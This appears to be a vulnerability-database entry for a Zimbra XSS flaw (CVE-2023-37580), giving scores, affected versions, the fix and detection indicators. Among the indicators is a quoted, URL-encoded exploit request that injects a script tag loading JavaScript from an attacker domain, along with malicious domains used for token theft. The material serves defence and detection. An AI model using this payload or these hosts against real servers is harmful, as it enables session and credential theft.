cbcvebase.
CVE-2023-37580
published 2023-07-31

CVE-2023-37580: Zimbra Collaboration (ZCS) 8 before 8.8.15 Patch 41 allows XSS in the Zimbra Classic Web Client.

PriorityP181medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2023-08-17
Exploited in the wild
EPSS
59.04%
99.0th percentile
Zimbra Collaboration (ZCS) 8 before 8.8.15 Patch 41 allows XSS in the Zimbra Classic Web Client.

Affected

2 ranges
VendorProductVersion rangeFixed in
synacorzimbra_collaboration_suite
synacorzimbra_collaboration_suite>= 8.8.0 < 8.8.158.8.15

Detection & IOCsextracted from sources · hover to see the quote

urlhttps://obsorth.opwtjnpoc[.]ml/pQyMSCXWyBWJpIos.js
urlhttps://applicationdevsoc[.]com/zimbraMalwareDefender/zimbraDefender.js
urlhttps://applicationdevsoc[.]com/tndgt/auth.js
domainntcpk[.]org
domainobsorth.opwtjnpoc[.]ml
domainapplicationdevsoc[.]com
urlhttps://mail.REDACTED[.]com/m/momovetost=acg%22%2F%3E%3Cscript%20src%3D%22https%3A%2F%2Fobsorth%2Eopwtjnpoc%2Eml%2FpQyMSCXWyBWJpIos%2Ejs%22%3E%3C%2Fscript%3E%2F%2F
path/m/momoveto?st=
otherhttp.favicon.hash:475145467
othericon_hash="475145467"
  • The XSS is triggered via the `st` parameter in the `/m/momoveto` endpoint of Zimbra Classic Web Client; monitor HTTP requests to this path containing script injection patterns in the `st` parameter.
  • Campaign 4 (Pakistan) exfiltrated Zimbra authentication tokens to ntcpk[.]org; monitor Zimbra server outbound connections to this domain as an indicator of token theft.
  • Most exploitation occurred after the hotfix was pushed to GitHub but before the official patch; monitor for exploitation attempts even on partially-patched or recently-patched instances.
  • ·The fix for CVE-2023-37580 was to escape the contents of the `st` parameter before it was set as the value in an HTML object; verify this escaping is present in the deployed version.
  • ·The vulnerability affects Zimbra Collaboration (ZCS) 8 before 8.8.15 Patch 41; the official patch was released July 25, 2023.

CVSS provenance

nvdv3.16.1MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
vulncheck6.1MEDIUM
cisa6.1MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.